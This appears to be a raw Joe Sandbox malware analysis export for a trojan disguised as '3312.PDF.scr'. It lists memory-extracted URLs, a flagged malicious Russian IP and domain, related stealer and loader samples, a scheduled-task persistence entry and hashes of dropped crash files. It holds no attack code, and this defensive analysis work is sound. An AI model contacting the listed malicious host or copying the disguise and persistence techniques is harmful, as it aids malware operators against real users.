                                    https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwmexplorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      https://www.msn.com/en-ulexplorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1745816371.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                        https://word.office.comexplorer.exe, 00000001.00000000.1745816371.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                        https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-darkexplorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://schemas.micrexplorer.exe, 00000001.00000000.1746657492.000000000CA42000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1742331928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://api.msn.com/BAexplorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707695380.0000000008C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1743944804.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1745816371.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://api.msn.com/explorer.exe, 00000001.00000000.1743944804.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707695380.0000000008C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://outlook.com_explorer.exe, 00000001.00000000.1745816371.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://www.msn.com/en-us/lifestyle/home-and-garden/13-thxexplorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  45.143.201.14
                                                                                  unicexpertmagazine.pwRussian Federation
                                                                                  202729PATENT-MEDIA-ASRUtrue
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1523195
                                                                                  Start date and time:2024-10-01 09:33:51 +02:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 6m 20s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:21
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:1
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:3312.PDF.scr
                                                                                  renamed because original name is a hash value
                                                                                  Original Sample Name:_i_300924_i_30_09_2024___UA973248410000000026006263312.PDF.scr
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.evad.winSCR@4/9@8/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 40
                                                                                  • Number of non-executed functions: 16
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .scr
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe, TextInputHost.exe, StartMenuExperienceHost.exe, mobsync.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.23.209.166, 2.23.209.171, 2.23.209.162, 2.23.209.169, 2.23.209.160, 2.23.209.168, 2.23.209.156, 2.23.209.167, 2.23.209.173, 184.28.90.27, 2.23.209.136, 2.23.209.191, 2.23.209.141, 2.23.209.189, 2.23.209.133, 2.23.209.140, 2.23.209.192, 2.23.209.135, 2.23.209.188, 20.190.159.75, 20.190.159.0, 20.190.159.4, 40.126.31.73, 40.126.31.69, 20.190.159.73, 20.190.159.71, 20.190.159.68
                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, r.bing.com.edgekey.net, www.tm.v4.a.prd.aadg.akadns.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, p-static.bing.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, r.bing.com, prod.fs.microsoft.com.akadns.net, api-msn-com.a-0003.a-msedge.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                  TimeTypeDescription
                                                                                  03:35:01API Interceptor98183x Sleep call for process: explorer.exe modified
                                                                                  08:35:09Task SchedulerRun new task: Firefox Default Browser Agent 494C779FAD7DA835 path: C:\Users\user\AppData\Roaming\djjergw
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  45.143.201.140435.pdf.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                  • alfacentarusmulticopter.ru/index.php
                                                                                  No context
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  PATENT-MEDIA-ASRU0435.pdf.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                  • 45.143.201.14
                                                                                  https://ird-tax-return-govt.comGet hashmaliciousUnknownBrowse
                                                                                  • 45.143.201.203
                                                                                  https://myvirgin-mobile-sign-in.comGet hashmaliciousUnknownBrowse
                                                                                  • 45.143.201.203
                                                                                  https://myvirgin-acc-login.com/Get hashmaliciousUnknownBrowse
                                                                                  • 45.143.201.203
                                                                                  3RDVB7Tu7q.exeGet hashmaliciousUnknownBrowse
                                                                                  • 45.143.201.7
                                                                                  8kZnhdYQR4.exeGet hashmaliciousAsyncRAT, AzorultBrowse
                                                                                  • 45.143.201.4
                                                                                  YDH48m4SJl.exeGet hashmaliciousAsyncRAT, Raccoon Stealer v2Browse
                                                                                  • 45.143.201.7
                                                                                  nfdsame.exeGet hashmaliciousVidarBrowse
                                                                                  • 45.143.201.4
                                                                                  dllhost.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                  • 45.143.201.4
                                                                                  vMpCBcWWPl.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                  • 45.143.201.4
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):2.367697438023328
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:tZC1L3BxwjAWMo+hiRichkMmzuiFDY4lO8k:tZ83Bxwj0o4QBhklzuiFDY4lO8
                                                                                  MD5:749DCC569AEDEA22E062A59509F53B49
                                                                                  SHA1:468523099EF81A5EE40E407EB1BC67E31FF77139
                                                                                  SHA-256:685D213BB828855E3CE54E0566C8E33D6B4B4BEB57F51B308BCCD856F75656BD
                                                                                  SHA-512:2FCB296AD91DD06EB85DCE8CC7F44A6D10DBA22F386C7108D4BCCE539980E62C269546270A511E21ECD9520137D37EB178CC0F7662CD2E1D89C56AD38E99E17C
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.2.4.1.7.7.9.7.1.0.4.2.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.3.b.e.f.5.b.-.c.e.d.b.-.4.c.4.3.-.8.1.3.7.-.0.e.a.f.4.5.8.f.5.3.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.7.e.a.2.5.6.-.c.b.d.a.-.4.e.8.2.-.a.6.7.f.-.f.2.f.d.5.e.e.3.b.5.9.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.1.4.-.0.0.0.1.-.0.0.1.4.-.a.6.5.8.-.1.2.b.8.c.6.1.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.
                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 17 streams, CheckSum 0x00000004, Tue Oct 1 07:36:20 2024, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):982628
                                                                                  Entropy (8bit):1.3911730031994762
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:TJtAFUSsaUP1Y0QPpzF2OuQH02EohelXKSW:NtApJU9Y0Qj2OJE+eLW
                                                                                  MD5:8A5E02ADB730AEFAA543A1FC66440C83
                                                                                  SHA1:6D9E2BEE0F873E9B7BBE7AD3C860DD195DA5E250
                                                                                  SHA-256:ABD5215B5BB36FB2729F27BD402E8D622B11AACEE7835B6A95B078F818B057CA
                                                                                  SHA-512:7747D0B20A206B55D20DB315F4E08892658F172B5191C63E4361E83666AB58575B914719FEF281F9C980C70F17B51F22DE8F5BD558B058939DACCDF25FD71595
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:MDMP..a..... .......t..f................ ........o..........................4...........(...........x.......8...........T...$.......H].....................................|...............................................................................eJ..............Lw......................T...........'..f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):10856
                                                                                  Entropy (8bit):3.6963496747990137
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:R6l7wVeJd57q0TH6YXzIgmfqzVUprY89bPK3DfhFm:R6lXJzmI6YjIgmfqzV8PiDf6
                                                                                  MD5:96DFF97A2A90528042AF637F23CABD61
                                                                                  SHA1:FECB314FC95BC782EA7E71ABCF0A0A31316F9B42
                                                                                  SHA-256:A4E3D68F7F24BDB2D80A3BB6E6A037AFCD65AA01931B5A3886ED261142D4EBA9
                                                                                  SHA-512:1D42C5292607BC84567D064524AB3E25B5601AB7A60DF2D88AD67861D9F111B56624908C5AFE28C5439980D31137391343D8EEE9D219BE5BDA7704DB3BB4780D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.8.0.<./.P.i.
                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):4724
                                                                                  Entropy (8bit):4.46221060678181
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwWl8zsVJg771I9mJWpW8VYOYm8M4JYmFPIQyq85c21b9Q3jd:uIjfvI7N47VuJ3f01ba3jd
                                                                                  MD5:2676CCFB915D230A180DFF64D978F7DA
                                                                                  SHA1:4043C0745F84120AF34205A80C889E65EB2D8A4C
                                                                                  SHA-256:F9CB77554C5AF57AD2CB6F1B70A6D85647F7E8CCF6873709B7556AC17B891E9A
                                                                                  SHA-512:B0DD9569EC9DB5A2A26698225AA79612D50D38CF38C91C0A5B8358BC734C87969749CD4D7E467323F9E9494AE6EBD489BCA4B94356825672291A8081707CDCDA
                                                                                  Malicious:false
                                                                                  Reputation:low
